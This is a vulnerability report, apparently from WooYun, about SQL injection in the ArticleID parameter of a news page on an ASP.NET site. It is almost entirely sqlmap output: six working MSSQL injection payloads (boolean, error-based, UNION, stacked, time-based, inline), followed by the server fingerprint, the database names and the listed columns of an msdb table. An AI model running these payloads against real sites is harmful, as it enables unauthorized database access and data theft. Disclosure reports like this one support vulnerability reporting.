WooYun.org

该页面存在sql注入http://**.**.**.**/ShowNewsDetail.aspx?PartDetailID=10&ArticleID=1309
Place: GET
Parameter: ArticleID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PartDetailID=10&ArticleID=1309 AND 1248=1248
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: PartDetailID=10&ArticleID=1309 AND 1611=CONVERT(INT,(CHAR(58) CHAR(115) CHAR(111) CHAR(121) CHAR(58) (SELECT (CASE WHEN (1611=1611) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(119) CHAR(105) CHAR(101) CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 28 columns
Payload: PartDetailID=10&ArticleID=1309 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(58) CHAR(115) CHAR(111) CHAR(121) CHAR(58) CHAR(83) CHAR(65) CHAR(111) CHAR(97) CHAR(116) CHAR(88) CHAR(88) CHAR(88) CHAR(65) CHAR(118) CHAR(58) CHAR(119) CHAR(105) CHAR(101) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: PartDetailID=10&ArticleID=1309; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: PartDetailID=10&ArticleID=1309 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: PartDetailID=10&ArticleID=(SELECT CHAR(58) CHAR(115) CHAR(111) CHAR(121) CHAR(58) (SELECT (CASE WHEN (3805=3805) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(119) CHAR(105) CHAR(101) CHAR(58))
---
可得到以下数据库：
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] web_outside3
[*] web_outside4
[*] xinocheng_0531
msdb库中
backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
| sysdac_instances |
+-------------------+
Column | Type |
+--------------------------+------------------+
| position | int |
| backup_finish_date | datetime |
| backup_set_id | int |
| backup_set_uuid | uniqueidentifier |
| backup_size | numeric |
| backup_start_date | datetime |
| begins_log_chain | bit |
| catalog_family_number | tinyint |
| catalog_media_number | smallint |
| checkpoint_lsn | numeric |
| code_page | smallint |
| collation_name | nvarchar |
| compatibility_level | tinyint |
| database_backup_lsn | numeric |
| database_creation_date | datetime |
| database_guid | uniqueidentifier |
| database_name | nvarchar |
| database_version | int |
| description | nvarchar |
| differential_base_guid | uniqueidentifier |
| differential_base_lsn | numeric |
| expiration_date | datetime |
| family_guid | uniqueidentifier |
| first_family_number | tinyint |
| first_lsn | numeric |
| first_media_number | smallint |
| first_recovery_fork_guid | uniqueidentifier |
| flags | int |
| fork_point_lsn | numeric |
| has_backup_checksums | bit |
| has_bulk_logged_data | bit |
| has_incomplete_metadata | bit |
| is_copy_only | bit |
| is_damaged | bit |
| is_force_offline | bit |
| is_password_protected | bit |
| is_readonly | bit |
| is_single_user | bit |
| is_snapshot | bit |
| last_family_number | tinyint |
| last_lsn | numeric |
| last_media_number | smallint |
| last_recovery_fork_guid | uniqueidentifier |
| machine_name | nvarchar |
| media_set_id | int |
| mtf_minor_version | tinyint |
| name | nvarchar |
| recovery_model | nvarchar |
| server_name | nvarchar |
| software_build_version | smallint |
| software_major_version | tinyint |
| software_minor_version | tinyint |
| software_vendor_id | int |
| sort_order | smallint |
| time_zone | smallint |
| type | char |
| unicode_compare_style | int |
| unicode_locale | int |
| user_name | nvarchar |
+--------------------------+------------------+
就放这么多吧